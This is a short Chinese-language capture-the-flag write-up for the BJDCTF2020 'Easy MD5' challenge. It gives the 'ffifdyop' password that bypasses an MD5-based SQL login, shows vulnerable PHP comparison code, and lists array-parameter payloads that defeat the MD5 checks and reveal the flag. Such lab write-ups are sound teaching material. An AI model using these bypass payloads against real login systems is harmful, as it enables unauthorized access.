3X02题目-[BJDCTF2020]Easy MD5
ffifdyop
存在MD5密码登录绕过的,ffifdyop万能密码
存在MD5弱类型比较的,可以用数组或者md5碰撞
之后转到levels91.php
查看源码发现一段php代码
<!--
$a = $GET['a'];
$b = $_GET['b'];
if($a != $b && md5($a) == md5($b)){
// wow, glzjin wants a girl friend.
-->
存在MD5弱类型比较的,可以用数组或者md5碰撞
这里构造payload:./levels91.php?a[]=1&a[]=2
转到levell.php
并得到php代码
<?php
error_reporting(0);
include "flag.php";
highlight_file(__FILE__);
if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
echo $flag;
}
接着post:param1[]=1¶m2[]=2
得到flag
flag{ab7744f3-727a-496a-b62c-0487617a48a0}